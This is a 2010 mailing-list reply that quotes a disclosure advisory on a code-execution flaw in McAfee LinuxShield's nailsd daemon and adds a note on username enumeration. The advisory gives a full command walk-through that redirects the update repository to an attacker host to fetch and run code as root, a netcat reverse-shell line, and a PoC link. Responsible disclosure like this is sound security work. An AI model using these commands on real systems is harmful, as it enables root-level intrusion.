ACK! You can find users who can log in to the web interface with this trick.
On 03.03.2010 09:14, Veal, Richard wrote:
>
> I believe there could also be a remote user enumeration using this
> service - when attempting to log into the web interface using a
> non-valid username / any password you get "Error: bad credentials" but
> when attempting to log with a valid username / invalid password you seem
> to get:
>
> "Error: bad credentials
> Error Information
> Error Code Description
> 34 authentication failure"
>
> Version 1.5.1, anyone confirm? Has this been mentioned before?
>
> Rich
>
> -----Original Message-----
> From: NSO Research [mailto:[email protected]]
> Sent: 02 March 2010 21:30
> To: [email protected]
> Subject: NSOADV-2010-004: McAfee LinuxShield remote/local code execution
>
> ______________________________________________________________________
>
> NSOADV-2010-004: McAfee LinuxShield remote/local code execution
> ______________________________________________________________________
> ______________________________________________________________________
>
> Title:                  McAfee LinuxShield remote/local code execution
> Severity:               Medium
> Advisory ID:            NSOADV-2010-004
> Found Date:             07.12.2009
> Date Reported:          05.02.2010
> Release Date:           02.03.2010
> Author:                 Nikolas Sotiriu (lofi)
> Website:                http://sotiriu.de
> Twitter:                http://twitter.com/nsoresearch
> Mail:                   nso-research at sotiriu.de
> URL:                    http://sotiriu.de/adv/NSOADV-2010-004.txt
> Vendor:                 McAfee (http://www.mcafee.com/)
> Affected Products:      McAfee LinuxShield <= 1.5.1
> Not Affected Products:  McAfee LinuxShield 1.5.1 with HF550192
> Remote Exploitable:     Yes (attacker must be authenticated)
> Local Exploitable:      Yes
> Patch Status:           Vendor released a patch (See Solution)
> Discovered by:          Nikolas Sotiriu
> Thanks to:              Thierry Zoller: For the permission to use his
>                         Policy
>
>
> Background:
> ===========
>
> LinuxShield detects and removes viruses and other potentially unwanted
> software on Linux-based systems. LinuxShield uses the powerful McAfee
> scanning engine - the engine common to all our anti-virus products.
>
> Although a few years ago, the Linux operating system was considered a
> secure environment, it is now seeing more occurrences of software
> specifically written to attack or exploit security weaknesses in
> Linux-based systems. Increasingly, Linux-based systems interact with
> Windows-based computers. Although viruses written to attack Windows-
> based systems do not directly attack Linux systems, a Linux server can
> harbor these viruses, ready to infect any client that connects to it.
>
> When installed on your Linux systems, LinuxShield provides protection
> against viruses, Trojan horses, and other types of potentially unwanted
> software.
>
> LinuxShield scans files as they are opened and closed - a technique
> known as on-access scanning. LinuxShield also incorporates an on-demand
> scanner that enables you to scan any directory or file in your host at
> any time.
>
> When kept up-to-date with the latest virus-definition (DAT) files,
> LinuxShield is an important part of your network security. We recommend
> that you set up an anti-virus security policy for your network,
> incorporating as many protective measures as possible.
>
> LinuxShield uses a web-browser interface, and a large number of
> LinuxShield installations can be centrally controlled by ePolicy
> Orchestrator.
>
> (Product description from LinuxShield Product Guide)
>
>
>
> Description:
> ============
>
> This vulnerability allows remote attackers to execute arbitrary code on
> vulnerable installations of McAfee LinuxShield. User interaction is not
> required to exploit this vulnerability but an attacker must be
> authenticated.
>
> The LinuxShield web interface communicates with the locally installed
> "nailsd" daemon, which listens on port 65443/tcp, to do configuration
> changes, query the configuration and execute tasks.
>
> Each user who can log in to the victim box can also authenticate
> itself to the "nailsd" and can do configuration changes and execute tasks
> with root privileges.
>
> A direct execution of commands is not possible, but it is possible to
> download and execute code through manipulation of the config and execute
> scheduled tasks of the LinuxShield.
>
>
> walk-through (after the TLS handshake):
> +--------------------------------------
>
> nailsd  > +OK welcome to the NAILS Statistics Service
> attacker> auth <user> <pass>
> nailsd  > +OK successful authentication
>
> # Set the Attacker repository to download our code from a httpd
> # (catalog.z)
> #---------------------------------------------------------------
> attacker> db set 1 _table=repository status=1 siteList=<?xml\ version="1.0"\ encoding="UTF-8"?><ns:SiteLists\ xmlns:ns="naSiteList"\ GlobalVersion="20030131003110"\ LocalVersion="20091209161903"\ Type="Client"><SiteList\ Default="1"\ Name="SomeGUID"><HttpSite\ Type="repository"\ Name="EvilRepo"\ Order="1"\ Server="<attackerhost>:80"\ Enabled="1"\ Local="1"><RelativePath>nai</RelativePath><UseAuth>0</UseAuth><UserName></UserName><Password\ Encrypted="0"/></HttpSite></SiteList></ns:SiteLists> _cmd=update
> nailsd  > +OK database changes buffered.
>
> # Execute task to set the attacker repository
> #---------------------------------------------------------------
> attacker> task setsitelist
> nailsd  > +OK setting sitelist from CMA.
>
> # Execute the default Update task to download the code
> #---------------------------------------------------------------
> attacker> task nstart LinuxShield Update
> nailsd  > +OK task LinuxShield Update starting
>
> # Create a Scan profile, which executes our code. The profiles are
> # not stored in the database.
> # Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg
> #---------------------------------------------------------------
> attacker> sconf ODS_99 begin
> nailsd  > +OK 1260400888
>
> # Set the variable "nailsd.profile.ODS_99.scannerPath" to the path
> # where our earlier downloaded catalog.z file is stored.
> # (/opt/McAfee/cma/scratch/update/catalog.z)
> #---------------------------------------------------------------
> attacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=true nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.ODS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=10000 nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/engine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.profile.ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibDir=/opt/NAI/LinuxShield/engine/lib nailsd.profile.ODS_99.enginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so nailsd.profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heuristicAnalysis=true nailsd.profile.ODS_99.macroAnalysis=true nailsd.profile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99.mime=true nailsd.profile.ODS_99.noJokes=false nailsd.profile.ODS_99.program=true nailsd.profile.ODS_99.quarantineChildren=1 nailsd.profile.ODS_99.quarantineDirectory=/quarantine nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.profile.ODS_99.scanChildren=2 nailsd.profile.ODS_99.scanMaxTmo=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profile.ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=true nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scratch/update/catalog.z nailsd.profile.ODS_99.scansPerChild=10000 nailsd.profile.ODS_99.slowScanChildren=0 nailsd.profile.ODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.filter.0.path=/proc nailsd.profile.ODS_99.filter.0.subdir=true nailsd.profile.ODS_99.filter.extensions.mode=all nailsd.profile.ODS_99.filter.extensions.type=extension nailsd.profile.ODS_99.action.Default.primary=Clean nailsd.profile.ODS_99.action.Default.secondary=Quarantine nailsd.profile.ODS_99.action.App.primary=Clean nailsd.profile.ODS_99.action.App.secondary=Quarantine nailsd.profile.ODS_99.action.timeout=Pass nailsd.profile.ODS_99.action.error=Block
> nailsd  > +OK configuration changes buffered
> attacker> sconf ODS_99 commit 1260400888
> nailsd  > +OK configuration changes stored
>
> # Set a scan task with the manipulated profile to execute the code
> #---------------------------------------------------------------
> attacker> db set 1260400888 _table=schedule taskName=Evil Task taskType=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/tmp;exclude:false timetable=type=unscheduled taskResults=0 i_lastRun=1260318482 status=Stopped _cmd=insert
> nailsd  > +OK database changes buffered
>
> # Execute scan task to execute the code
> #---------------------------------------------------------------
> attacker> task nstart Evil Task
>
> +-------------------------------------- walk-through EOF
>
>
> To get a reverse root shell place something like this in the catalog.z
>
> --- snip ---
> #!/bin/sh
> nc -nv <attacker_host> 4444 -e /bin/sh
> --- /snip ---
>
>
>
> Proof of Concept :
> ==================
>
> http://sotiriu.de/software/NSOPOC-2010-004.tar.gz
>
>
>
> Solution:
> =========
>
> McAfee Advisory
> +--------------
> https://kc.mcafee.com/corporate/index?page=content&id=SB10007
>
>
>
> Disclosure Timeline (YYYY/MM/DD):
> =================================
>
> 2009.12.07: Vulnerability found
> 2010.02.03: Asked vendor for a PGP key
> 2010.02.05: Vendor sent his PGP key
> 2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure
>             date (2010.02.18) to Vendor
> 2010.02.05: Vendor acknowledges the reception of the advisory
> 2010.02.16: Asked for a status update, because the planned release date is
>             2010.02.18.
> 2010.02.16: Vendor responds that they are currently working on a patch
> 2010.02.17: Changed release date to 2010.02.25.
> 2010.02.22: Vendor gives a status update, that they are able to release
>             the patch on 2010.02.25.
> 2010.02.24: Asked for a list of affected products and the advisory url.
> 2010.02.24: Vendor sends the list.
> 2010.03.02: Release of this Advisory
